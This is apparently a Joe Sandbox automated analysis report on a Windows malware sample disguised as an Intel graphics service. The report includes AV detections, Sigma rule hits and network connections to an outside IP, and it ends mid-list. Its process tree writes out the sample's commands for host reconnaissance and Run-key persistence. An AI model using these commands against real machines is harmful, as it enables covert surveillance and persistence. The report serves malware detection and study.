Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report IGFXCUISERVICE

Overview

General Information

Sample Name:IGFXCUISERVICE (renamed file extension from none to exe)
Analysis ID:550959
MD5:d90d0f4d6dad402b5d025987030cc87c
SHA1:fad66bdf5c5dc2c050cbc574832c6995dba086a0
SHA256:1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c
Infos:

Most interesting Screenshot:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Writes or reads registry keys via WMI
Encrypted powershell cmdline option found
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Sigma detected: Direct Autorun Keys Modification
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Sigma detected: Reg Add RUN Key
Uses reg.exe to modify the Windows registry
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • IGFXCUISERVICE.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\IGFXCUISERVICE.exe" MD5: D90D0F4D6DAD402B5D025987030CC87C)
    • powershell.exe (PID: 3160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • igfxCUIService.exe (PID: 5780 cmdline: "C:\ProgramData\SystemData\igfxCUIService.exe" MD5: D90D0F4D6DAD402B5D025987030CC87C)
      • powershell.exe (PID: 6936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • reg.exe (PID: 740 cmdline: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • getmac.exe (PID: 6608 cmdline: C:\Windows\system32\getmac.exe MD5: 6AB605BD2223BFB2E55A466BE9816914)
        • WMIC.exe (PID: 984 cmdline: "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • powershell.exe (PID: 6036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5592 cmdline: C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6628 cmdline: wmic OS get Caption, CSDVersion, OSArchitecture, Version / value MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • cmd.exe (PID: 5508 cmdline: C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 7164 cmdline: wmic nicconfig where 'IPEnabled = True' get ipaddress MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • cmd.exe (PID: 4676 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6752 cmdline: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • igfxCUIService.exe (PID: 5788 cmdline: "C:\ProgramData\SystemData\igfxCUIService.exe" MD5: D90D0F4D6DAD402B5D025987030CC87C)
    • cmd.exe (PID: 2248 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 1472 cmdline: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • igfxCUIService.exe (PID: 6380 cmdline: "C:\ProgramData\SystemData\igfxCUIService.exe" MD5: D90D0F4D6DAD402B5D025987030CC87C)
    • cmd.exe (PID: 6440 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Direct Autorun Keys ModificationShow sources
Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, CommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4676, ProcessCommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, ProcessId: 6752
Sigma detected: Reg Add RUN KeyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\ProgramData\SystemData\igfxCUIService.exe" , ParentImage: C:\ProgramData\SystemData\igfxCUIService.exe, ParentProcessId: 5780, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F, ProcessId: 4676
Sigma detected: Suspicious Execution of Powershell with Base64Show sources
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt', CommandLine|base64offset|contains: fi, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\SystemData\igfxCUIService.exe" , ParentImage: C:\ProgramData\SystemData\igfxCUIService.exe, ParentProcessId: 5780, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt', ProcessId: 6936
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe', CommandLine|base64offset|contains: rr, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IGFXCUISERVICE.exe" , ParentImage: C:\Users\user\Desktop\IGFXCUISERVICE.exe, ParentProcessId: 7144, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe', ProcessId: 3160
Sigma detected: T1086 PowerShell ExecutionShow sources
Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132863908489920372.3160.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: IGFXCUISERVICE.exeVirustotal: Detection: 51%Perma Link
Source: IGFXCUISERVICE.exeMetadefender: Detection: 20%Perma Link
Source: IGFXCUISERVICE.exeReversingLabs: Detection: 41%
Antivirus / Scanner detection for submitted sampleShow sources
Source: IGFXCUISERVICE.exeAvira: detected
Antivirus detection for dropped fileShow sources
Source: C:\ProgramData\SystemData\igfxCUIService.exeAvira: detection malicious, Label: TR/Redcap.rjsiq
Multi AV Scanner detection for dropped fileShow sources
Source: C:\ProgramData\SystemData\igfxCUIService.exeMetadefender: Detection: 20%Perma Link
Source: C:\ProgramData\SystemData\igfxCUIService.exeReversingLabs: Detection: 41%
Source: IGFXCUISERVICE.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49856 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.254.131.176:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: IGFXCUISERVICE.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002CB17F FindFirstFileExW,
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.878407019.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.818065175.000000000119C000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 